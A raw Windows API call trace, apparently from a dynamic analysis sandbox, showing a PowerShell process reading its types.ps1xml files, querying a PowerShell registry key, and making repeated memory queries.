	[0395.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d410 | out: lpFileInformation=0x26d410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0395.831] SetErrorMode (uMode=0x1) returned 0x1
	[0395.834] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.834] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.834] CoTaskMemFree (pv=0x46a9e0) 
	[0395.841] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0395.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0395.841] CoTaskMemFree (pv=0x46a9e0) 
	[0395.842] GetACP () returned 0x4e4
	[0395.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0395.850] SetErrorMode (uMode=0x1) returned 0x1
	[0395.850] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0395.851] GetFileType (hFile=0x324) returned 0x1
	[0395.851] SetErrorMode (uMode=0x1) returned 0x1
	[0395.851] GetFileType (hFile=0x324) returned 0x1
	[0395.852] ReadFile (in: hFile=0x324, lpBuffer=0x300d448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x300d448*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.172] ReadFile (in: hFile=0x324, lpBuffer=0x300d448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x300d448*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.172] ReadFile (in: hFile=0x324, lpBuffer=0x300d448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x300d448*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.173] ReadFile (in: hFile=0x324, lpBuffer=0x300d448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x300d448*, lpNumberOfBytesRead=0x26d348*=0xcf3, lpOverlapped=0x0) returned 1
	[0396.173] ReadFile (in: hFile=0x324, lpBuffer=0x300c8a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x300c8a3*, lpNumberOfBytesRead=0x26d348*=0x0, lpOverlapped=0x0) returned 1
	[0396.173] ReadFile (in: hFile=0x324, lpBuffer=0x300d448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x300d448*, lpNumberOfBytesRead=0x26d348*=0x0, lpOverlapped=0x0) returned 1
	[0396.175] CloseHandle (hObject=0x324) returned 1
	[0396.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0396.178] SetErrorMode (uMode=0x1) returned 0x1
	[0396.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d2c0 | out: lpFileInformation=0x26d2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0396.179] SetErrorMode (uMode=0x1) returned 0x1
	[0396.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0396.180] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3a8 | out: phkResult=0x26d3a8*=0x324) returned 0x0
	[0396.180] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d32c, lpData=0x0, lpcbData=0x26d328*=0x0 | out: lpType=0x26d32c*=0x1, lpData=0x0, lpcbData=0x26d328*=0x56) returned 0x0
	[0396.180] CoTaskMemAlloc (cb=0x5a) returned 0x47f5c0
	[0396.180] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2fc, lpData=0x47f5c0, lpcbData=0x26d2f8*=0x56 | out: lpType=0x26d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d2f8*=0x56) returned 0x0
	[0396.180] CoTaskMemFree (pv=0x47f5c0) 
	[0396.181] RegCloseKey (hKey=0x324) returned 0x0
	[0396.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0396.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0396.571] GetSystemInfo (in: lpSystemInfo=0x26bfe0 | out: lpSystemInfo=0x26bfe0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0396.571] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0396.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.589] SetErrorMode (uMode=0x1) returned 0x1
	[0396.589] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0396.589] GetFileType (hFile=0x320) returned 0x1
	[0396.589] SetErrorMode (uMode=0x1) returned 0x1
	[0396.589] GetFileType (hFile=0x320) returned 0x1
	[0396.589] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.589] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.590] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.590] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.590] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.590] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.590] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.590] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.591] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.591] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.592] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.592] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.592] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.592] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.593] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.593] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.593] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.594] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.594] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.595] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.595] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.595] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.595] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.596] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.596] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.596] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.596] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.596] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.597] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.597] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.597] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.597] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.598] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.600] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.600] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.600] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.600] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.601] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.601] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.601] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.601] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1000, lpOverlapped=0x0) returned 1
	[0396.602] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x1b4, lpOverlapped=0x0) returned 1
	[0396.602] ReadFile (in: hFile=0x320, lpBuffer=0x2f07648, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d348, lpOverlapped=0x0 | out: lpBuffer=0x2f07648*, lpNumberOfBytesRead=0x26d348*=0x0, lpOverlapped=0x0) returned 1
	[0396.602] CloseHandle (hObject=0x320) returned 1
	[0396.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.602] SetErrorMode (uMode=0x1) returned 0x1
	[0396.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d2c0 | out: lpFileInformation=0x26d2c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0396.602] SetErrorMode (uMode=0x1) returned 0x1
	[0396.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d3a8 | out: phkResult=0x26d3a8*=0x320) returned 0x0
	[0396.603] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d32c, lpData=0x0, lpcbData=0x26d328*=0x0 | out: lpType=0x26d32c*=0x1, lpData=0x0, lpcbData=0x26d328*=0x56) returned 0x0
	[0396.603] CoTaskMemAlloc (cb=0x5a) returned 0x49baa0
	[0396.603] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d2fc, lpData=0x49baa0, lpcbData=0x26d2f8*=0x56 | out: lpType=0x26d2fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d2f8*=0x56) returned 0x0
	[0396.603] CoTaskMemFree (pv=0x49baa0) 
	[0396.603] RegCloseKey (hKey=0x320) returned 0x0
	[0396.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0396.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0397.353] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.361] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.363] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.363] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.363] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.363] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.363] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.365] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.701] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.701] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.701] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.701] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.702] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.702] VirtualQuery (in: lpAddress=0x26c090, lpBuffer=0x26cf50, dwLength=0x30 | out: lpBuffer=0x26cf50*(BaseAddress=0x26c000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
